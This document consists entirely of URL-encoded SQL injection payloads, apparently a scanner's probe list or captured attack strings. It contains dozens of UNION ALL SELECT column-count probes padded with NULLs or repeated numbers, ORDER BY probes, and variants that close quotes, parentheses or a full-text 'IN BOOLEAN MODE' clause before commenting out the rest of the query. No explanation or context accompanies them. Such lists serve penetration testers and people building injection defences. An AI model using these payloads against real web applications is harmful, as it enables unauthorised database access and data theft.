-6422%27%20%2B%20%28SELECT%20%27YAvK%27%20WHERE%204492%3D4492%20UNION%20ALL%20SELECT%204492%2C%204492%2C%204492%2C%204492--%20%20%29%20%2B%20%27 -6165%27%20%2B%20%28SELECT%20%27sCJg%27%20WHERE%207828%3D7828%20UNION%20ALL%20SELECT%207828%2C%207828%2C%207828%2C%207828%2C%207828--%20%20%29%20%2B%20%27 -5090%27%20%2B%20%28SELECT%20%27HsFT%27%20WHERE%206591%3D6591%20UNION%20ALL%20SELECT%206591%2C%206591%2C%206591%2C%206591%2C%206591%2C%206591--%20%20%29%20%2B%20%27 -8618%27%20%2B%20%28SELECT%20%27TudM%27%20WHERE%203396%3D3396%20UNION%20ALL%20SELECT%203396%2C%203396%2C%203396%2C%203396%2C%203396%2C%203396%2C%203396--%20%20%29%20%2B%20%27 -9193%27%20%2B%20%28SELECT%20%27Unct%27%20WHERE%201872%3D1872%20UNION%20ALL%20SELECT%201872%2C%201872%2C%201872%2C%201872%2C%201872%2C%201872%2C%201872%2C%201872--%20%20%29%20%2B%20%27 -5335%27%20%2B%20%28SELECT%20%27VMmd%27%20WHERE%201531%3D1531%20UNION%20ALL%20SELECT%201531%2C%201531%2C%201531%2C%201531%2C%201531%2C%201531%2C%201531%2C%201531%2C%201531--%20%20%29%20%2B%20%27 -2435%27%20%2B%20%28SELECT%20%27Lzks%27%20WHERE%205086%3D5086%20UNION%20ALL%20SELECT%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086%2C%205086--%20%20%29%20%2B%20%27 -6656%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201--%20%20%23 -1566%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%208298--%20%20%23 -8325%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207608--%20%20%23 -6450%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208240%2C%208240--%20%20%23 -7131%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206313%2C%206313%2C%206313--%20%20%23 -6828%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203838%2C%203838%2C%203838%2C%203838--%20%20%23 -6374%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203149%2C%203149%2C%203149%2C%203149%2C%203149--%20%20%23 -3666%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205973%2C%205973%2C%205973%2C%205973%2C%205973%2C%205973--%20%20%23 -3229%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206938%2C%206938%2C%206938%2C%206938%2C%206938%2C%206938%2C%206938--%20%20%23 -7822%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201427%2C%201427%2C%201427%2C%201427%2C%201427%2C%201427%2C%201427%2C%201427--%20%20%23 -3438%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672--%20%20%23 -4914%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423--%20%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289441%3D9441 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%288414%3D8414 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%287914%3D7914 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%281102%3D1102 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%281094%3D1094 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%281058%3D1058 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%281613%3D1613 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%288885%3D8885 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%281947%3D1947 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%286197%3D6197 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284424%3D4424 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%285723%3D5723 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%282311%3D2311 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%281646%3D1646 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284239%3D4239 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%285868%3D5868 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%286468%3D6468 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%283648%3D3648 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%289122%3D9122 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%282098%3D2098 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%282869%3D2869 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285114%3D5114 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284321%3D4321 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285879%3D5879 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%282539%3D2539 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%283682%3D3682 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284201%3D4201 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%288448%3D8448 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%287325%3D7325 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%289935%3D9935 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27XLsL%27%3D%27XLsL 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27zglD%27%3D%27zglD 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27GqGX%27%3D%27GqGX 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Vqly%27%3D%27Vqly 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27cZbN%27%3D%27cZbN 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27dPPP%27%3D%27dPPP 